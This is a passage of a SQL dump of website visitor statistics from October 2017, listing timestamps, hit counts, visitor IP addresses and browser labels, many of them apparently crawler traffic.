8059,1508387778,1,1,0,0,'151.80.27.118','other'),(168060,1508387926,1,1,0,0,'217.69.133.6','other'),(168061,1508388160,1,1,0,0,'91.209.11.236','other'),(168062,1508388366,1,1,0,0,'217.182.132.55','other'),(168063,1508389009,1,1,0,0,'82.145.220.120','chrome'),(168064,1508389053,1,1,0,0,'141.8.132.19','other'),(168065,1508389149,1,1,0,0,'51.255.65.87','other'),(168066,1508389251,1,1,0,0,'51.255.64.106','other'),(168067,1508389402,1,1,0,0,'91.209.11.236','other'),(168068,1508389434,2,2,0,0,'217.182.132.15','other'),(168069,1508389440,1,1,0,0,'51.255.65.73','other'),(168070,1508390269,1,1,0,0,'51.255.65.47','other'),(168071,1508390658,1,1,0,0,'151.80.27.118','other'),(168072,1508390829,1,1,0,0,'217.182.132.154','other'),(168073,1508391066,1,1,0,0,'51.255.65.19','other'),(168074,1508391075,1,1,0,0,'51.255.71.112','other'),(168075,1508391196,1,1,0,0,'194.50.254.169','chrome'),(168076,1508391208,1,1,0,0,'91.196.178.70','chrome'),(168077,1508391209,1,1,0,0,'91.209.11.236','other'),(168078,1508391249,1,1,0,0,'51.255.65.6','other'),(168079,1508391269,2,2,0,0,'217.182.132.70','other'),(168080,1508391525,1,1,0,0,'95.132.33.100','firefox'),(168081,1508391822,1,1,0,0,'217.182.132.63','other'),(168082,1508392141,1,1,0,0,'51.255.71.116','other'),(168083,1508392359,1,1,0,0,'207.46.13.81','other'),(168084,1508392717,1,1,0,0,'173.234.234.212','other'),(168085,1508392867,1,1,0,0,'194.50.254.169','chrome'),(168086,1508392930,1,1,0,0,'8.29.198.25','other'),(168087,1508393241,1,1,0,0,'51.255.65.40','other'),(168088,1508393329,1,1,0,0,'207.46.13.81','other'),(168089,1508393504,1,1,0,0,'51.255.65.29','other'),(168090,1508393661,2,2,0,0,'79.143.185.25','other'),(168091,1508393812,1,1,0,0,'91.225.4.21','chrome'),(168092,1508394669,1,1,0,0,'51.255.65.36','other'),(168093,1508394674,1,1,0,0,'130.180.219.42','chrome'),(168094,1508394846,1,1,0,0,'91.209.11.236','other'),(168095,1508395429,1,1,0,0,'51.255.65.29','other'),(168096,1508395540,1,1,0,0,'91.196.178.70','chrome'),(168097,1508395653,1,1,0,0,'51.255.65.95','other'),(168098,1508395897,1,1,0,0,'91.209.11.236','other'),(168099,1508395943,1,1,0,0,'217.182.132.193','other'),(168100,1508396359,1,0,1,0,'66.249.70.29',''),(168101,1508396714,1,1,0,0,'51.255.65.66','other'),(168102,1508396919,1,1,0,0,'37.53.233.212','chrome'),(168103,1508396991,1,1,0,0,'164.132.162.155','other'),(168104,1508397363,1,1,0,0,'217.182.132.63','other'),(168105,1508397393,1,1,0,0,'51.255.71.123','other'),(168106,1508397687,1,1,0,0,'91.196.178.134','chrome'),(168107,1508397961,1,1,0,0,'51.255.65.21','other'),(168108,1508398079,1,1,0,0,'51.255.65.57','other'),(168109,1508399060,1,1,0,0,'194.44.216.190','firefox'),(168110,1508399296,1,1,0,0,'137.74.207.164','other'),(168111,1508399421,1,1,0,0,'188.163.16.6','chrome'),(168112,1508399525,1,0,1,0,'66.249.64.28',''),(168113,1508400061,1,1,0,0,'217.182.132.85','other'),(168114,1508400098,1,1,0,0,'217.182.132.88','other'),(168115,1508400578,1,1,0,0,'51.255.65.13','other'),(168116,1508401838,1,1,0,0,'91.196.178.70','chrome'),(168117,1508402332,1,1,0,0,'217.182.132.61','other'),(168118,1508402436,1,1,0,0,'180.76.15.138','other'),(168119,1508402661,1,1,0,0,'178.95.82.19','chrome'),(168120,1508402666,1,1,0,0,'137.74.207.159','other'),(168121,1508402669,1,1,0,0,'51.255.65.69','other'),(168122,1508403255,2,2,0,0,'137.74.203.194','other'),(168123,1508403276,1,1,0,0,'51.255.71.112','other'),(168124,1508403460,1,1,0,0,'193.19.152.14','chrome'),(168125,1508403465,1,1,0,0,'37.52.71.171','chrome'),(168126,1508403754,1,1,0,0,'217.69.133.4','other'),(168127,1508403761,1,1,0,0,'8.29.198.26','other'),(168128,1508403869,1,1,0,0,'67.205.184.68','chrome'),(168129,1508404249,1,1,0,0,'37.9.113.182','other'),(168130,1508404408,1,1,0,0,'51.255.65.69','other'),(168131,1508404459,1,1,0,0,'217.182.132.146','other'),(168132,1508404479,1,1,0,0,'217.182.132.186','other'),(168133,1508404863,1,1,0,0,'217.182.132.33','other'),(168134,1508404932,1,1,0,0,'51.255.65.54','other'),(168135,1508405152,1,1,0,0,'5.45.207.82','other'),(168136,1508405158,1,1,0,0,'51.255.65.20','other'),(168137,1508405402,1,1,0,0,'51.255.65.64','other'),(168138,1508405533,1,1,0,0,'87.250.224.85','other'),(168139,1508405770,1,1,0,0,'207.46.13.121','other'),(168140,1508405816,1,1,0,0,'137.74.201.100','other'),(168141,1508405832,1,1,0,0,'51.255.65.31','other'),(168142,1508406068,1,1,0,0,'51.255.65.7','other'),(168143,1508406605,1,1,0,0,'51.255.65.22','other'),(168144,1508406841,1,1,0,0,'91.196.178.65','chrome'),(168145,1508407040,1,1,0,0,'51.255.65.82','other'),(168146,1508407041,1,1,0,0,'77.222.134.100','firefox'),(168147,1508407169,1,1,0,0,'217.182.132.78','other'),(168148,1508407310,1,1,0,0,'46.219.238.118','chrome'),(168149,1508407530,1,1,0,0,'207.154.217.224','other'),(168150,1508407838,1,1,0,0,'217.182.132.185','other'),(168151,1508408203,1,1,0,0,'217.182.132.84','other'),(168152,1508408265,1,1,0,0,'51.255.65.7','other'),(168153,1508408505,1,1,0,0,'217.182.132.4','other'),(168154,1508408642,1,1,0,0,'217.182.132.149','other'),(168155,1508409134,1,1,0,0,'217.182.132.18','other'),(168156,1508409270,2,2,0,0,'217.182.132.29','other'),(168157,1508409350,1,0,1,0,'66.249.64.28',''),(168158,1508409378,1,0,1,0,'66.249.70.29',''),(168159,1508409382,3,0,3,0,'66.249.70.25',''),(168160,1508409776,1,1,0,0,'164.132.162.157','other'),(168161,1508410269,1,1,0,0,'217.182.132.154','other'),(168162,1508410383,1,1,0,0,'217.182.132.24','other'),(168163,1508410492,1,1,0,0,'207.154.217.224','other'),(168164,1508410638,1,1,0,0,'217.182.132.177','other'),(168165,1508410788,1,1,0,0,'180.76.15.157','other'),(168166,1508410964,1,1,0,0,'217.182.132.80','other'),(168167,1508411563,1,1,0,0,'193.19.152.14','chrome'),(168168,1508411777,1,1,0,0,'151.80.27.118','other'),(168169,1508412818,1,1,0,0,'207.46.13.125','other'),(168170,1508413128,1,1,0,0,'37.52.17.106','chrome'),(168171,1508413332,5,5,0,0,'142.4.200.37','other'),(168172,1508413613,1,0,1,0,'66.249.64.30',''),(168173,1508413868,1,1,0,0,'51.255.71.111','other'),(168174,1508414079,1,1,0,0,'217.182.132.66','other'),(168175,1508414488,1,1,0,0,'92.112.104.222','chrome'),(168176,1508414530,1,1,0,0,'217.69.133.9','other'),(168177,1508414603,1,1,0,0,'8.29.198.26','other'),(168178,1508414704,1,1,0,0,'78.111.190.204','chrome'),(168179,1508415510,1,1,0,0,'176.31.231.10','other'),(168180,1508415756,1,0,1,0,'66.249.64.30',''),(168181,1508416829,1,0,1,0,'66.249.70.29',''),(168182,1508417114,2,2,0,0,'91.229.121.1','other'),(168183,1508417666,1,1,0,0,'51.255.65.22','other'),(168184,1508417690,1,1,0,0,'137.74.207.161','other'),(168185,1508417787,1,1,0,0,'217.182.132.71','other'),(168186,1508417919,1,1,0,0,'51.255.65.5','other'),(168187,1508417934,1,1,0,0,'217.182.132.151','other'),(168188,1508417939,1,1,0,0,'217.182.132.16','other'),(168189,1508418232,1,1,0,0,'91.196.177.147','chrome'),(168190,1508418367,1,1,0,0,'51.255.65.2','other'),(168191,1508418426,1,1,0,0,'51.255.65.68','other'),(168192,1508418698,1,1,0,0,'51.255.65.224','other'),(168193,1508418888,1,1,0,0,'51.255.65.77','other'),(168194,1508418973,1,1,0,0,'91.196.178.70','chrome'),(168195,1508419008,1,1,0,0,'51.255.65.39','other'),(168196,1508419337,1,1,0,0,'51.255.71.111','other'),(168197,1508419699,1,1,0,0,'217.182.132.152','other'),(168198,1508419932,1,1,0,0,'78.152.161.156','chrome'),(168199,1508420051,1,1,0,0,'217.182.132.61','other'),(168200,1508420194,1,1,0,0,'217.182.132.67','other'),(168201,1508420293,1,1,0,0,'51.255.65.55','other'),(168202,1508420621,1,1,0,0,'91.196.177.114','chrome'),(168203,1508421164,1,1,0,0,'51.255.65.39','other'),(168204,1508421465,1,1,0,0,'51.255.65.36','other'),(168205,1508421532,1,1,0,0,'37.73.236.202','chrome'),(168206,1508421751,1,1,0,0,'217.182.132.15','other'),(168207,1508422051,1,1,0,0,'217.182.132.37','other'),(168208,1508422386,1,1,0,0,'217.182.132.92','other'),(168209,1508422623,1,1,0,0,'157.55.39.253','other'),(168210,1508422929,1,1,0,0,'217.182.132.74','other'),(168211,1508423905,1,1,0,0,'217.182.132.94','other'),(168212,1508424153,1,1,0,0,'51.255.71.127','other'),(168213,1508424392,1,1,0,0,'51.255.65.33','other'),(168214,1508424471,1,1,0,0,'91.229.121.1','other'),(168215,1508424669,1,1,0,0,'217.182.132.193','other'),(168216,1508425059,1,0,1,0,'66.249.70.29',''),(168217,1508425187,1,1,0,0,'217.182.132.185','other'),(168218,1508425297,1,1,0,0,'51.255.71.111','other'),(168219,1508425437,1,1,0,0,'8.29.198.26','other'),(168220,1508425589,1,1,0,0,'51.255.65.38','other'),(168221,1508426347,1,1,0,0,'51.255.65.79','other'),(168222,1508426591,1,0,1,0,'66.249.64.30',''),(168223,1508426602,1,1,0,0,'217.182.132.77','other'),(168224,1508426748,1,1,0,0,'217.69.133.194','other'),(168225,1508426762,1,0,1,0,'66.249.70.27',''),(168226,1508426839,1,1,0,0,'51.255.65.22','other'),(168227,1508427304,1,1,0,0,'217.182.132.152','other'),(168228,1508427816,1,1,0,0,'217.182.132.53','other'),(168229,1508427995,1,0,1,0,'66.249.64.29',''),(168230,1508428018,1,0,1,0,'66.249.64.28',''),(168231,1508428112,1,1,0,0,'64.246.165.210','firefox'),(168232,1508428456,1,1,0,0,'91.196.178.162','chrome'),(168233,1508429000,1,1,0,0,'217.182.132.74','other'),(168234,1508429610,1,1,0,0,'199.58.86.211','other'),(168235,1508430164,1,1,0,0,'217.182.132.34','other'),(168236,1508430169,1,1,0,0,'92.113.188.48','chrome'),(168237,1508430612,1,0,1,0,'66.249.70.29',''),(168238,1508430633,1,1,0,0,'91.196.178.71','firefox'),(168239,1508431143,1,1,0,0,'51.255.65.71','other'),(168240,1508431810,1,1,0,0,'51.255.65.48','other'),(168241,1508431987,1,1,0,0,'137.74.207.110','other'),(168242,1508432115,1,1,0,0,'157.55.39.253','other'),(168243,1508432217,1,1,0,0,'37.53.233.212','chrome'),(168244,1508432458,1,1,0,0,'51.255.71.98','other'),(168245,1508433105,1,1,0,0,'137.74.207.164','other'),(168246,1508433274,1,1,0,0,'217.182.132.62','other'),(168247,1508433554,1,1,0,0,'137.74.207.159','other'),(168248,1508433562,1,1,0,0,'66.249.64.29','chrome'),(168249,1508433661,1,1,0,0,'51.255.65.8','other'),(168250,1508433739,1,1,0,0,'217.182.132.77','other'),(168251,1508434284,1,1,0,0,'217.182.132.57','other'),(168252,1508434622,1,1,0,0,'217.182.132.178','other'),(168253,1508434756,1,1,0,0,'51.255.71.100','other'),(168254,1508434851,1,1,0,0,'137.74.207.116','other'),(168255,1508435007,1,1,0,0,'217.182.132.191','other'),(168256,1508435516,1,1,0,0,'51.255.65.20','other'),(168257,1508435720,1,1,0,0,'217.182.132.96','other'),(168258,1508435974,1,1,0,0,'95.10.28.14','other'),(168259,1508436138,1,1,0,0,'85.106.120.136','other'),(168260,1508436161,1,1,0,0,'217.182.132.62','other'),(168261,1508436267,1,1,0,0,'8.29.198.25','other'),(168262,1508436464,3,3,0,0,'54.165.59.7','other'),(168263,1508436653,1,1,0,0,'217.69.133.194','other'),(168264,1508436684,1,1,0,0,'217.182.132.185','other'),(168265,1508436968,1,1,0,0,'217.182.132.19','other'),(168266,1508437030,1,1,0,0,'157.55.39.253','other'),(168267,1508437094,1,1,0,0,'91.196.178.131','chrome'),(168268,1508437114,1,1,0,0,'51.255.65.9','other'),(168269,1508437209,1,1,0,0,'51.255.65.13','other'),(168270,1508437276,1,1,0,0,'217.182.132.4','other'),(168271,1508437409,1,1,0,0,'67.215.230.92','other'),(168272,1508437811,1,1,0,0,'217.182.132.36','other'),(168273,1508438150,1,1,0,0,'51.255.65.5','other'),(168274,1508438632,1,1,0,0,'51.255.65.49','other'),(168275,1508438634,1,1,0,0,'107.167.107.137','other'),(168276,1508438654,1,1,0,0,'217.182.132.69','other'),(168277,1508438670,1,1,0,0,'82.145.221.110','chrome'),(168278,1508438775,2,2,0,0,'92.113.188.48','chrome'),(168279,1508438793,1,1,0,0,'107.167.107.179','other'),(168280,1508438819,1,1,0,0,'46.211.149.47','other'),(168281,1508438911,1,1,0,0,'51.255.65.35','other'),(168282,1508438950,1,1,0,0,'176.31.231.10','other'),(168283,1508439030,1,1,0,0,'176.8.141.224','chrome'),(168284,1508439462,1,1,0,0,'51.255.71.133','other'),(168285,1508439509,1,1,0,0,'217.182.132.63','other'),(168286,1508439672,1,1,0,0,'207.46.13.121','other'),(168287,1508439765,1,1,0,0,'217.182.132.5','other'),(168288,1508440329,1,1,0,0,'217.182.132.4','other'),(168289,1508440405,1,1,0,0,'51.255.65.76','other'),(168290,1508440692,1,1,0,0,'51.255.65.54','other'),(168291,1508440741,1,1,0,0,'51.255.71.118','other'),(168292,1508440855,1,1,0,0,'217.182.132.79','other'),(168293,1508440945,1,1,0,0,'217.182.132.25','other'),(168294,1508441164,1,1,0,0,'66.249.64.28','chrome'),(168295,1508441174,1,1,0,0,'66.249.70.25','chrome'),(168296,1508441997,1,1,0,0,'51.255.65.73','other'),(168297,1508442184,1,1,0,0,'51.255.65.36','other'),(168298,1508442275,1,1,0,0,'5.164.173.116','chrome'),(168299,1508443241,1,1,0,0,'217.69.133.3','other'),(168300,1508443894,1,0,1,0,'66.249.64.28',''),(168301,1508444618,1,1,0,0,'188.191.237.17','chrome'),(168302,1508444761,1,0,1,0,'66.249.64.30',''),(168303,1508445175,1,0,1,0,'66.249.64.29',''),(168304,1508445430,5,5,0,0,'142.4.200.37','other'),(168305,1508445677,1,1,0,0,'157.55.39.253','other'),(168306,1508446925,1,0,1,0,'66.249.64.30',''),(168307,1508447090,1,1,0,0,'8.29.198.26','other'),(168308,1508448428,1,0,1,0,'66.249.64.28',''),(168309,1508448731,1,1,0,0,'217.69.133.4','other'),(168310,1508449346,1,1,0,0,'157.55.39.253','other'),(168311,1508449369,1,1,0,0,'91.209.11.236','other'),(168312,1508450151,1,1,0,0,'207.46.13.125','other'),(168313,1508450756,1,0,1,0,'66.249.70.29',''),(168314,1508450921,1,0,1,0,'66.249.64.30',''),(168315,1508451725,1,1,0,0,'157.55.39.253','other'),(168316,1508451994,1,1,0,0,'180.76.15.150','other'),(168317,1508455140,1,0,1,0,'66.249.70.25',''),(168318,1508457232,2,0,2,0,'66.249.64.30',''),(168319,1508457255,1,1,0,0,'217.182.132.94','other'),(168320,1508457906,1,1,0,0,'51.255.71.130','other'),(168321,1508457921,1,1,0,0,'217.182.132.75','other'),(168322,1508457922,1,1,0,0,'8.29.198.25','other'),(168323,1508458025,1,1,0,0,'217.182.132.95','other'),(168324,1508458389,1,1,0,0,'51.255.71.112','other'),(168325,1508458705,1,1,0,0,'51.255.65.77','other'),(168326,1508458859,1,1,0,0,'51.255.65.59','other'),(168327,1508458945,1,1,0,0,'51.255.65.16','other'),(168328,1508458952,1,1,0,0,'137.74.207.114','other'),(168329,1508458968,1,1,0,0,'51.255.65.9','other'),(168330,1508459094,1,1,0,0,'164.132.164.180','other'),(168331,1508459836,1,1,0,0,'217.69.133.4','other'),(168332,1508460544,1,1,0,0,'91.209.11.236','other'),(168333,1508460992,1,1,0,0,'207.46.13.121','other'),(168334,1508461478,1,1,0,0,'217.182.132.57','other'),(168335,1508461585,1,0,1,0,'66.249.70.27',''),(168336,1508462302,1,0,1,0,'66.249.64.30',''),(168337,1508462334,2,0,2,0,'66.249.64.29',''),(168338,1508463049,1,1,0,0,'217.182.132.7','other'),(168339,1508463284,1,1,0,0,'51.255.65.27','other'),(168340,1508463492,1,1,0,0,'51.255.65.37','other'),(168341,1508463583,1,0,1,0,'66.249.64.30',''),(168342,1508463856,1,1,0,0,'217.182.132.173','other'),(168343,1508463996,1,1,0,0,'51.255.65.36','other'),(168344,1508464111,1,1,0,0,'66.249.70.29','chrome'),(168345,1508464153,1,1,0,0,'217.69.133.5','other'),(168346,1508464154,1,1,0,0,'217.69.133.9','other'),(168347,1508464313,1,1,0,0,'217.182.132.72','other'),(168348,1508464764,1,1,0,0,'217.182.132.186','other'),(168349,1508465428,1,1,0,0,'51.255.65.35','other'),(168350,1508465890,1,1,0,0,'217.182.132.75','other'),(168351,1508466597,1,1,0,0,'217.182.132.62','other'),(168352,1508466815,1,0,1,0,'66.249.64.30',''),(168353,1508467037,1,1,0,0,'164.132.162.157','other'),(168354,1508467551,1,1,0,0,'164.132.162.158','other'),(168355,1508467732,1,1,0,0,'217.182.132.74','other'),(168356,1508468032,1,1,0,0,'217.182.132.155','other'),(168357,1508468419,1,1,0,0,'51.255.65.78','other'),(168358,1508468752,1,1,0,0,'8.29.198.27','other'),(168359,1508468765,1,1,0,0,'51.255.65.61','other'),(168360,1508469457,1,1,0,0,'217.182.132.55','other'),(168361,1508469480,2,2,0,0,'91.209.11.236','other'),(168362,1508469509,1,1,0,0,'51.255.65.34','other'),(168363,1508469586,2,2,0,0,'51.255.65.95','other'),(168364,1508469637,1,1,0,0,'217.69.133.203','other'),(168365,1508469734,1,1,0,0,'157.55.39.253','other'),(168366,1508470108,1,1,0,0,'51.255.65.25','other'),(168367,1508470195,1,1,0,0,'217.182.132.188','other'),(168368,1508470518,1,0,1,0,'66.249.70.29',''),(168369,1508471419,1,1,0,0,'51.255.71.116','other'),(168370,1508471540,1,1,0,0,'137.74.207.170','other'),(168371,1508472162,1,1,0,0,'51.255.65.91','other'),(168372,1508472931,1,1,0,0,'51.255.65.22','other'),(168373,1508472982,1,1,0,0,'66.249.70.29','chrome'),(168374,1508472990,1,1,0,0,'51.255.65.65','other'),(168375,1508473383,1,1,0,0,'137.74.207.120','other'),(168376,1508473452,1,1,0,0,'220.181.132.178','chrome'),(168377,1508473487,1,1,0,0,'162.211.181.78','chrome'),(168378,1508473510,1,1,0,0,'106.120.162.111','chrome'),(168379,1508474066,1,1,0,0,'137.74.207.119','other'),(168380,1508474738,1,1,0,0,'66.249.64.29','chrome'),(168381,1508474753,1,1,0,0,'91.209.11.236','other'),(168382,1508475079,1,1,0,0,'46.48.13.161','chrome'),(168383,1508475505,1,1,0,0,'217.69.133.6','other'),(168384,1508475586,1,1,0,0,'51.255.65.77','other'),(168385,1508475620,1,1,0,0,'164.132.162.159','other'),(168386,1508475712,1,1,0,0,'51.255.65.42','other'),(168387,1508475830,1,1,0,0,'164.132.164.180','other'),(168388,1508476132,1,0,1,0,'66.249.64.30',''),(168389,1508476388,1,0,1,0,'66.249.64.28',''),(168390,1508476900,1,1,0,0,'51.255.65.48','other'),(168391,1508477391,1,1,0,0,'51.255.65.28','other'),(168392,1508477483,1,1,0,0,'51.255.65.51','other'),(168393,1508477578,1,1,0,0,'51.255.65.5','other'),(168394,1508478052,1,1,0,0,'217.182.132.96','other'),(168395,1508478374,1,0,1,0,'66.249.64.30',''),(168396,1508478472,2,2,0,0,'142.4.200.37','other'),(168397,1508478638,1,1,0,0,'66.249.70.25','chrome'),(168398,1508478672,1,1,0,0,'46.48.13.161','chrome'),(168399,1508478726,1,0,1,0,'66.249.70.29',''),(168400,1508478892,1,1,0,0,'51.255.71.119','other'),(168401,1508479265,1,1,0,0,'217.182.132.65','other'),(168402,1508479384,1,1,0,0,'217.182.132.7','other'),(168403,1508479484,1,1,0,0,'92.113.188.48','chrome'),(168404,1508479554,1,1,0,0,'217.182.132.97','other'),(168405,1508479561,1,1,0,0,'31.13.114.49','other'),(168406,1508479588,1,1,0,0,'8.29.198.25','other'),(168407,1508479962,1,1,0,0,'217.182.132.28','other'),(168408,1508480058,1,1,0,0,'217.182.132.148','other'),(168409,1508480576,1,1,0,0,'137.74.201.100','other'),(168410,1508480650,1,1,0,0,'51.255.65.33','other'),(168411,1508480818,1,1,0,0,'188.163.16.6','chrome'),(168412,1508480863,1,1,0,0,'51.255.71.131','other'),(168413,1508481014,1,1,0,0,'217.69.133.203','other'),(168414,1508481202,1,1,0,0,'91.196.178.65','chrome'),(168415,1508481376,1,1,0,0,'37.9.113.115','other'),(168416,1508481415,1,1,0,0,'51.255.65.51','other'),(168417,1508481423,1,1,0,0,'91.196.178.72','chrome'),(168418,1508481706,1,1,0,0,'51.255.65.52','other'),(168419,1508481780,1,1,0,0,'217.182.132.51','other'),(168420,1508481849,1,1,0,0,'66.249.64.30','chrome'),(168421,1508482302,1,1,0,0,'217.182.132.24','other'),(168422,1508482593,1,1,0,0,'91.196.178.134','firefox'),(168423,1508483060,1,1,0,0,'106.38.241.101','other'),(168424,1508483344,1,1,0,0,'217.182.132.56','other'),(168425,1508483691,1,1,0,0,'66.249.70.27','chrome'),(168426,1508483828,2,2,0,0,'91.196.178.72','chrome'),(168427,1508483837,1,0,1,0,'66.249.64.28',''),(168428,1508484005,1,1,0,0,'51.255.65.29','other'),(168429,1508484016,1,1,0,0,'51.255.65.89','other'),(168430,1508484037,1,1,0,0,'66.249.70.25','chrome'),(168431,1508484517,1,1,0,0,'164.132.162.187','other'),(168432,1508484531,1,1,0,0,'91.196.179.138','chrome'),(168433,1508484640,1,1,0,0,'74.115.214.142','other'),(168434,1508484751,2,2,0,0,'91.196.178.72','chrome'),(168435,1508485117,1,1,0,0,'164.132.162.188','other'),(168436,1508485324,1,1,0,0,'51.255.71.101','other'),(168437,1508485542,1,1,0,0,'51.255.65.10','other'),(168438,1508485595,1,1,0,0,'37.53.242.150','chrome'),(168439,1508485763,1,0,1,0,'66.249.70.27',''),(168440,1508485827,1,1,0,0,'91.196.178.70','chrome'),(168441,1508486106,1,0,1,0,'66.249.70.29',''),(168442,1508486158,1,1,0,0,'51.255.65.40','other'),(168443,1508486269,1,1,0,0,'137.74.207.116','other'),(168444,1508486307,1,1,0,0,'51.255.65.48','other'),(168445,1508486409,1,1,0,0,'217.182.132.184','other'),(168446,1508486453,1,1,0,0,'91.196.178.168','chrome'),(168447,1508486565,1,1,0,0,'207.46.13.121','other'),(168448,1508486585,1,1,0,0,'51.255.71.129','other'),(168449,1508486666,1,1,0,0,'51.255.71.127','other'),(168450,1508486721,1,1,0,0,'188.191.237.17','chrome'),(168451,1508486724,1,1,0,0,'217.182.132.173','other'),(168452,1508486931,1,1,0,0,'66.249.64.30','chrome'),(168453,1508487073,1,0,1,0,'66.249.70.29',''),(168454,1508487196,1,1,0,0,'164.132.162.156','other'),(168455,1508487372,1,1,0,0,'217.182.132.63','other'),(168456,1508487704,1,1,0,0,'217.182.132.87','other'),(168457,1508487777,1,1,0,0,'217.182.132.172','other'),(168458,1508487798,1,1,0,0,'91.196.178.165','chrome'),(168459,1508488207,1,1,0,0,'5.45.207.82','other'),(168460,1508488447,1,1,0,0,'66.249.70.27','chrome'),(168461,1508488780,1,1,0,0,'217.182.132.29','other'),(168462,1508488989,1,1,0,0,'109.86.72.163','firefox'),(168463,1508489284,1,0,1,0,'66.249.64.29',''),(168464,1508489477,1,1,0,0,'37.9.113.101','other'),(168465,1508489671,1,1,0,0,'51.255.65.38','other'),(168466,1508490412,1,1,0,0,'8.29.198.25','other'),(168467,1508490456,1,1,0,0,'141.8.142.74','other'),(168468,1508490491,1,1,0,0,'54.165.59.7','other'),(168469,1508490808,1,1,0,0,'91.196.177.110','chrome'),(168470,1508490836,1,1,0,0,'162.210.196.130','other'),(168471,1508491343,1,1,0,0,'91.196.178.166','chrome'),(168472,1508491606,1,1,0,0,'217.69.133.6','other'),(168473,1508491619,1,1,0,0,'51.255.65.63','other'),(168474,1508491796,1,1,0,0,'51.255.71.115','other'),(168475,1508491942,1,1,0,0,'217.69.133.5','other'),(168476,1508492076,1,1,0,0,'217.182.132.90','other'),(168477,1508492077,1,1,0,0,'51.255.71.100','other'),(168478,1508492294,1,1,0,0,'51.255.65.3','other'),(168479,1508492393,1,1,0,0,'66.249.64.28','chrome'),(168480,1508492559,1,1,0,0,'217.182.132.83','other'),(168481,1508492594,1,1,0,0,'217.182.132.156','other'),(168482,1508492795,1,1,0,0,'51.255.65.34','other'),(168483,1508493140,1,1,0,0,'51.255.65.50','other'),(168484,1508494082,1,1,0,0,'164.132.162.187','other'),(168485,1508494088,2,2,0,0,'108.59.8.80','other'),(168486,1508494579,1,1,0,0,'164.132.162.160','other'),(168487,1508494612,1,1,0,0,'66.249.70.27','chrome'),(168488,1508494627,1,1,0,0,'141.8.132.22','other'),(168489,1508494729,2,0,2,0,'66.249.64.29',''),(168490,1508495476,1,1,0,0,'66.102.9.25','chrome'),(168491,1508495479,1,1,0,0,'51.255.65.19','other'),(168492,1508495587,1,1,0,0,'217.182.132.93','other'),(168493,1508495957,1,1,0,0,'217.182.132.67','other'),(168494,1508496353,1,1,0,0,'46.219.5.34','chrome'),(168495,1508496483,1,0,1,0,'66.249.64.29',''),(168496,1508496530,1,1,0,0,'51.255.65.91','other'),(168497,1508496735,1,1,0,0,'37.54.161.239','firefox'),(168498,1508496832,1,0,1,0,'66.249.64.30',''),(168499,1508496845,1,1,0,0,'51.255.71.128','other'),(168500,1508497293,1,1,0,0,'91.196.177.146','chrome'),(168501,1508497454,1,1,0,0,'217.69.133.4','other'),(168502,1508497682,1,1,0,0,'217.182.132.17','other'),(168503,1508497797,1,1,0,0,'51.255.65.90','other'),(168504,1508497920,1,1,0,0,'66.249.64.30','chrome'),(168505,1508497972,1,1,0,0,'51.255.65.10','other'),(168506,1508498416,1,1,0,0,'51.255.71.132','other'),(168507,1508498429,1,1,0,0,'51.255.65.51','other'),(168508,1508498459,1,1,0,0,'91.196.178.68','chrome'),(168509,1508498561,1,1,0,0,'164.132.162.164','other'),(168510,1508498632,1,1,0,0,'157.55.39.253','other'),(168511,1508498773,1,1,0,0,'51.255.65.12','other'),(168512,1508498774,1,0,1,0,'66.249.70.27',''),(168513,1508498901,1,1,0,0,'91.209.11.236','other'),(168514,1508499171,1,1,0,0,'46.211.97.185','chrome'),(168515,1508499418,1,1,0,0,'66.249.70.25','chrome'),(168516,1508499821,1,1,0,0,'217.182.132.85','other'),(168517,1508500289,1,1,0,0,'51.255.65.35','other'),(168518,1508500317,1,1,0,0,'217.182.132.179','other'),(168519,1508501248,1,1,0,0,'8.29.198.27','other'),(168520,1508501444,1,1,0,0,'51.255.65.4','other'),(168521,1508501784,1,1,0,0,'217.182.132.151','other'),(168522,1508502090,1,1,0,0,'51.255.65.48','other'),(168523,1508502436,3,3,0,0,'46.229.168.72','other'),(168524,1508502448,5,5,0,0,'46.229.168.76','other'),(168525,1508502468,6,6,0,0,'46.229.168.74','other'),(168526,1508502510,2,2,0,0,'46.229.168.70','other'),(168527,1508502520,9,9,0,0,'46.229.168.80','other'),(168528,1508502557,5,5,0,0,'46.229.168.69','other'),(168529,1508502578,4,4,0,0,'46.229.168.73','other'),(168530,1508502615,1,1,0,0,'46.229.168.78','other'),(168531,1508502628,1,1,0,0,'195.10.210.49','firefox'),(168532,1508502629,5,5,0,0,'46.229.168.68','other'),(168533,1508502662,3,3,0,0,'46.229.168.65','other'),(168534,1508502710,2,2,0,0,'46.229.168.66','other'),(168535,1508502808,4,4,0,0,'46.229.168.71','other'),(168536,1508502957,2,2,0,0,'46.229.168.77','other'),(168537,1508502970,4,4,0,0,'46.229.168.67','other'),(168538,1508503020,1,1,0,0,'37.52.17.214','chrome'),(168539,1508503060,4,4,0,0,'46.229.168.79','other'),(168540,1508503271,1,1,0,0,'180.76.15.27','other'),(168541,1508503313,1,1,0,0,'51.255.65.70','other'),(168542,1508503441,9,9,0,0,'46.229.168.75','other'),(168543,1508503463,6,6,0,0,'46.229.168.76','other'),(168544,1508503482,5,5,0,0,'46.229.168.72','other'),(168545,1508503606,6,6,0,0,'46.229.168.70','other'),(168546,1508503625,5,5,0,0,'46.229.168.68','other'),(168547,1508503669,3,3,0,0,'46.229.168.78','other'),(168548,1508503718,6,6,0,0,'46.229.168.65','other'),(168549,1508503747,4,4,0,0,'46.229.168.71','other'),(168550,1508503756,2,2,0,0,'46.229.168.66','other'),(168551,1508503816,5,5,0,0,'46.229.168.80','other'),(168552,1508503962,1,1,0,0,'46.229.168.77','other'),(168553,1508504006,1,1,0,0,'46.229.168.73','other'),(168554,1508504071,5,5,0,0,'46.229.168.67','other'),(168555,1508504185,1,1,0,0,'51.255.71.131','other'),(168556,1508504209,2,2,0,0,'91.209.11.236','other'),(168557,1508504344,1,1,0,0,'46.229.168.69','other'),(168558,1508504493,1,1,0,0,'37.52.35.203','chrome'),(168559,1508504719,1,1,0,0,'217.182.132.78','other'),(168560,1508504772,1,1,0,0,'46.229.168.74','other'),(168561,1508504888,3,3,0,0,'46.229.168.78','other'),(168562,1508505066,1,0,1,0,'66.249.70.29',''),(168563,1508505150,1,1,0,0,'51.255.65.21','other'),(168564,1508505195,1,1,0,0,'91.196.178.71','chrome'),(168565,1508505291,1,1,0,0,'217.182.132.77','other'),(168566,1508505599,1,1,0,0,'217.182.132.22','other'),(168567,1508506182,1,1,0,0,'217.182.132.182','other'),(168568,1508506695,1,1,0,0,'37.9.113.134','other'),(168569,1508506822,1,1,0,0,'217.182.132.92','other'),(168570,1508506835,1,1,0,0,'157.55.39.253','other'),(168571,1508506975,1,1,0,0,'217.182.